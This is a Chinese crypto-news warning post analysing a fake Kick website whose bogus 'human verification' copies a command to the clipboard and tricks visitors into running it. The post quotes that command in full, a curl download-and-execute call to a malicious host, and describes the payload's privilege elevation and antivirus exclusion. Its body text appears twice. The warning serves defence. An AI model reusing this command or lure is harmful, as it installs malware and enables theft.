您现在的位置是: > 快讯快讯
钓鱼!钓鱼!又见钓鱼木马!!!
admin 2025-01-11 16:46:15 快讯 已有人查阅
导读又一朋友中了钓鱼木马,他是怎么中的钓鱼陷阱呢?上午在几个群里看到一个聊天记录,讲的是一位老哥上了假的钓鱼网站导致电脑中了木马资产被盗。我们来分析一下他被盗的流程。如上聊天记录所示,他当时是访问了一个假的kick网站...
又一朋友中了钓鱼木马,他是怎么中的钓鱼陷阱呢?
上午在几个群里看到一个聊天记录,讲的是一位老哥上了假的钓鱼网站导致电脑中了木马资产被盗。我们来分析一下他被盗的流程。如上聊天记录所示,他当时是访问了一个假的kick网站,网址如下:https://kick.com.im/重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!
当我们访问此网站时,发现会出现一个是否是人类的验证,我们点击进行验证,会弹出以下提示:我们来解释上图是让你做什么操作:
按下Windows R打开运行对话框Windows R是windows系统下的一个快键命令,用来快速的打开运行对话框的。此处就是让你准备执行恶意脚本文件。
按下CTRL V粘贴验证文本地球人都知道CTRL V是用来粘贴的,在这一步大家是不是有个疑问,想CTRL V之前得先CTRL C进行复制呀,为什么没有复制直接就让粘贴了呢?我们看看钓鱼网站前端的代码:秘密就在这里,记得我们刚访问网站时让我们验证是否是人类,验证时得点鼠标,上面这段js代码就是检测鼠标的点击事件,当发现鼠标点击时就把恶意脚本自动的复制到粘贴板中,这时候不用CTRL C就能直接CTRL V了。
那粘贴板中的恶意代码是什么呢?
cmd /c "curl -k -L -Sshttps://hcaptcha.ru/r-o "%TEMP%1.cmd" && "%TEMP%1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.
上面的代码意思是从https://hcaptcha.ru/r(重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!)下载文件存到临时目录中,文件的名字叫“1.cmd”,然后执行此文件。打开下载后的文件发现是如下的代码:这段恶意代码首先会检查是否有管理员权限,当有管理员权限后会尝试将此脚本提升为管理员权限 。第二部分那一坨代码用Base64进行了编码,当解码后发现功能是将C:排除在防病毒扫描之外。这步的目的是告诉杀毒软件“C:|你就不要扫描啦!”,这样当木马在C盘执行时就不会被杀毒软件发现。第三部分代码gpt也没有解析出来,大致的用处就是从某一网站上下载木马到C盘,然后执行木马,这里就需要@evilcos老师等各位安全专家进行具体的分析。
针对上述钓鱼骗局我们可以得到如下的经验 :
访问任何不熟悉的网址前一定要多验证网址的正确性。像上文中的受害者把钓鱼网站当成了kick直播的网址,kick的官方网址是https://kick.com/,如果受害者去google上搜索或者询问gpt也就不会上当。
执行每一步操作前都要慎重,要想明白这步操作的用处是什么,当我们不懂或者不清楚时,要善于用GPT 等AI 工具。
Web3处处是陷阱,希望大家都能避开各种坑。
上午在几个群里看到一个聊天记录,讲的是一位老哥上了假的钓鱼网站导致电脑中了木马资产被盗。我们来分析一下他被盗的流程。如上聊天记录所示,他当时是访问了一个假的kick网站,网址如下:https://kick.com.im/重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!
当我们访问此网站时,发现会出现一个是否是人类的验证,我们点击进行验证,会弹出以下提示:我们来解释上图是让你做什么操作:
按下Windows R打开运行对话框Windows R是windows系统下的一个快键命令,用来快速的打开运行对话框的。此处就是让你准备执行恶意脚本文件。
按下CTRL V粘贴验证文本地球人都知道CTRL V是用来粘贴的,在这一步大家是不是有个疑问,想CTRL V之前得先CTRL C进行复制呀,为什么没有复制直接就让粘贴了呢?我们看看钓鱼网站前端的代码:秘密就在这里,记得我们刚访问网站时让我们验证是否是人类,验证时得点鼠标,上面这段js代码就是检测鼠标的点击事件,当发现鼠标点击时就把恶意脚本自动的复制到粘贴板中,这时候不用CTRL C就能直接CTRL V了。
那粘贴板中的恶意代码是什么呢?
cmd /c "curl -k -L -Sshttps://hcaptcha.ru/r-o "%TEMP%1.cmd" && "%TEMP%1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.
上面的代码意思是从https://hcaptcha.ru/r(重要提醒:此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!此为钓鱼网站,不要访问!!!)下载文件存到临时目录中,文件的名字叫“1.cmd”,然后执行此文件。打开下载后的文件发现是如下的代码:这段恶意代码首先会检查是否有管理员权限,当有管理员权限后会尝试将此脚本提升为管理员权限 。第二部分那一坨代码用Base64进行了编码,当解码后发现功能是将C:排除在防病毒扫描之外。这步的目的是告诉杀毒软件“C:|你就不要扫描啦!”,这样当木马在C盘执行时就不会被杀毒软件发现。第三部分代码gpt也没有解析出来,大致的用处就是从某一网站上下载木马到C盘,然后执行木马,这里就需要@evilcos老师等各位安全专家进行具体的分析。
针对上述钓鱼骗局我们可以得到如下的经验 :
访问任何不熟悉的网址前一定要多验证网址的正确性。像上文中的受害者把钓鱼网站当成了kick直播的网址,kick的官方网址是https://kick.com/,如果受害者去google上搜索或者询问gpt也就不会上当。
执行每一步操作前都要慎重,要想明白这步操作的用处是什么,当我们不懂或者不清楚时,要善于用GPT 等AI 工具。
Web3处处是陷阱,希望大家都能避开各种坑。
本文标签:
很赞哦! ()
相关文章
随机图文
Vitalik 公布以太坊基金会支出信息更新,其薪水为每年 18.2 万新加坡元
binance交易平台 消息,以太坊联合创始人 Vitalik Buterin 在社交平台发文表示,其薪水为
某鲸鱼1小时前从币安提取了384.8万枚PNUT,价值约712万美元
据链上分析师余烬监测,一个鲸鱼在 1 小时前从币安提取了 384.8 万枚(712万美元)PNUT 到地
最新行情晚报:WLD价格达2.145美元/枚,日内跌幅-3.03%
BOSS Wallet数据来源,Worldcoin今日价格行情,WLD最新价格跌落至$2.145,跌幅达-3.03%,交易
超3000名墨西哥人遭遇疑似加密货币交易机器人骗局,多个办事处被关闭
据墨西哥媒体报道,特瓦坎和普埃布拉地区有 3,000 多人因疑似加密货币交易机器人骗局而
大家在看
钓鱼!钓鱼!又见钓鱼木马!!!
标签云
大家喜欢
- PeckShield:Curve创始人地址在UwULend上被清算267万枚CRV
- ether.fi:7月份协议收入258 万美元,5%将用于ETHFI回购及LP计划
- ZachXBT:多个X账号被黑客入侵,发布meme币相关诈骗信息
- 灰度地址于15小时前累计从Coinbase Prime收到约10120枚ETH
- Solv Protocol 在 Babylon 上推出流动性质押代币 SolvBTC.BBN
- Aligned 开放新空投查询,空投群体为不同生态系统代币持有者
- ETH/BTC 汇率多头 James Fickel 2 小时前卖出 6500 枚 ETH 换成 235.6 枚 WBTC 还款减仓
- Manta基金会将财库稳定加密资产分配至生息稳定币wUSDM
- 火币HTX将于今日18时上线AVACN(AVACOIN),现已开放充币
- 某个曾参与以太坊ICO的鲸鱼地址9小时前再次卖出499枚ETH